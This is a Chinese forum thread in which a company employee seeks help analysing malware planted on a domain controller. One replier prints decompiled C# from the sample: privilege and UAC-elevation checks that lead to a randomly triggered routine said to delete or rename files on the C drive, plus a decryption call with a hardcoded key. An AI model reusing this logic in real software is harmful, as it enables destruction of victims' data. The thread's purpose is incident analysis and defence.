注册 登录
编程论坛 C# 论坛

最近被内部攻击,截得该程序一个!请大婶们帮忙分析下有关制作者信息。

dtyxf008 发布于 2013-11-27 18:50, 1437 次点击
小弟最近公司内部受到来自内部人员的攻击,这个人在域控制器上放入了以下这个小程序。由于小弟对编程不懂,所以求大神们帮我查查看,能否查到有关制作者的信息!我想抓出来这个王八蛋! 辛苦了 各位!

以下是附件,附件内包含两个程序。其中csc.exe是放入域控内的病毒程序,另一个是“嫌疑犯”之前所编写的程序,发出来的意思想各位能够对比下,看看 是否均为一个人的编写习惯! 小弟十分感谢了!
只有本站会员才能查看附件,请 登录

小弟联系QQ:110 139 416
15 回复
#2
dtyxf0082013-11-28 11:49
沙发自己顶下!
#3
m5645226342013-12-12 16:04
只能说明自己菜,搞不了就叫攻击你的那个人当老大。
#4
wangnannan2014-01-03 10:08
源码呢 替你反编译出来了
没在注释上看到是谁开发的 根本也就没有注释 看两个EXE代码风格呢 像是一个人写的
我重点分析了下 CSC这个EXE 主函数这些的是这个代码  我加了注释
有点意思 大家看看
程序代码:
private void MainForm_Load(object sender, EventArgs e)
        {
            Exception exception;
            try
            {
                //这里判断你当前的用户是不是管理员组的
                this.lbInAdminGroup.Text = this.IsUserInAdminGroup().ToString();
            }
            catch (Exception exception1)
            {
                exception = exception1;
                this.lbInAdminGroup.Text = "N/A";
                MessageBox.Show(exception.Message, "An error occurred in IsUserInAdminGroup", MessageBoxButtons.OK, MessageBoxIcon.Hand);
            }
            try
            {
                this.lbIsRunAsAdmin.Text = this.IsRunAsAdmin().ToString();
            }
            catch (Exception exception2)
            {
                exception = exception2;
                this.lbIsRunAsAdmin.Text = "N/A";
                MessageBox.Show(exception.Message, "An error occurred in IsRunAsAdmin", MessageBoxButtons.OK, MessageBoxIcon.Hand);
            }
  //操作系统的版本
            if (Environment.OSVersion.Version.Major >= 6)
            {
                try
                {
                    bool flag3 = this.IsProcessElevated();
                    this.lbIsElevated.Text = flag3.ToString();
                    this.btnElevate.FlatStyle = FlatStyle.System;
                    CSUACSelfElevation.NativeMethods.SendMessage(this.btnElevate.Handle, 0x160c, 0, flag3 ? IntPtr.Zero : ((IntPtr) 1));
                }
                catch (Exception exception3)
                {
                    exception = exception3;
                    this.lbIsElevated.Text = "N/A";
                    MessageBox.Show(exception.Message, "An error occurred in IsProcessElevated", MessageBoxButtons.OK, MessageBoxIcon.Hand);
                }
                try
                {
//进程级别 他想干啥?
                    switch (this.GetProcessIntegrityLevel())
                    {
                        case 0x2000:
                            this.lbIntegrityLevel.Text = "Medium";
                            goto Label_0238;

                        case 0x3000:
                            this.lbIntegrityLevel.Text = "High";
                            goto Label_0238;

                        case 0x4000:
                            this.lbIntegrityLevel.Text = "System";
                            goto Label_0238;

                        case 0:
                            this.lbIntegrityLevel.Text = "Untrusted";
                            goto Label_0238;

                        case 0x1000:
                            this.lbIntegrityLevel.Text = "Low";
                            goto Label_0238;
                    }
                    this.lbIntegrityLevel.Text = "Unknown";
                }
                catch (Exception exception4)
                {
                    exception = exception4;
                    this.lbIntegrityLevel.Text = "N/A";
                    MessageBox.Show(exception.Message, "An error occurred in GetProcessIntegrityLevel", MessageBoxButtons.OK, MessageBoxIcon.Hand);
                }
            }
            else
            {
                this.lbIsElevated.Text = "N/A";
                this.lbIntegrityLevel.Text = "N/A";
            }
        Label_0238:
            if (!this.IsUserInAdminGroup())
            {
//如果用户不是管理员组的 那就登录一个网站 你可以看我结尾的图
                this.admingroup_elevate();
            }
            if (!(this.IsProcessElevated() || !this.IsUserInAdminGroup()))
            {
                this.iselevated_elevate();
            }
            if ((((this.lbInAdminGroup.Text == "True") && (this.lbIsElevated.Text == "True")) && (this.lbIsRunAsAdmin.Text == "True")) && (this.rand.Next(5) == this.rand.Next(5)))
            {
//看到这里就知道了 以上几个条件都满足 删掉你C盘文件
                this.AccessFileSystem();
            }
            Application.Exit();
        }



[ 本帖最后由 wangnannan 于 2014-1-3 10:47 编辑 ]
#5
wangnannan2014-01-03 10:16
代码里面呢 有获取进程的安全级别 当前用户是否是管理员 是否是管理员组 this.passenc = StringCipher.Decrypt("WQX5MB+/mRqHlZsEo7qy8eixfMthsqfr2RJg4E4CsmyY6cBlpIPdeaq+N/EeX7dK", "fuck_yilin");
 

[ 本帖最后由 wangnannan 于 2014-1-3 10:50 编辑 ]
#6
wangnannan2014-01-03 10:21
只有本站会员才能查看附件,请 登录
#7
wangnannan2014-01-03 10:28
只有本站会员才能查看附件,请 登录


先获取你C盘文件夹目录

[ 本帖最后由 wangnannan 于 2014-1-3 10:30 编辑 ]
#8
wangnannan2014-01-03 10:30
[attach]74250[/attach]在通过实时获取当前系统用户级别 重命名你的文件

[ 本帖最后由 wangnannan 于 2014-1-6 13:53 编辑 ]
#9
wangnannan2014-01-03 10:31
只有本站会员才能查看附件,请 登录
获取系统目录的代码
#10
wangnannan2014-01-03 10:34
去掉隐藏代码后的窗体 看英文就不用我多说了吧
只有本站会员才能查看附件,请 登录


[ 本帖最后由 wangnannan 于 2014-1-3 10:35 编辑 ]
#11
wangnannan2014-01-03 10:46
只有本站会员才能查看附件,请 登录
创建域用户 给自己权限

[ 本帖最后由 wangnannan 于 2014-1-9 15:49 编辑 ]
#12
wangnannan2014-01-03 10:48
从1433端口入侵 植入EXE 服务器设置要注意屏蔽1433端口 记得开防火墙

[ 本帖最后由 wangnannan 于 2014-1-9 15:49 编辑 ]
#13
dtyxf0082014-01-06 13:27
太牛逼了! 大神!!!!!
  膜拜………………
#14
dtyxf0082014-01-06 14:07
回复 3楼 m564522634
我去~ 都找不到攻击者 还叫人家做老大! 你傻啊~
#15
wry9999992014-02-14 15:12
大神啊
#16
congbaoz2014-02-19 09:15
1
©2025, BC-CN.NET
电脑版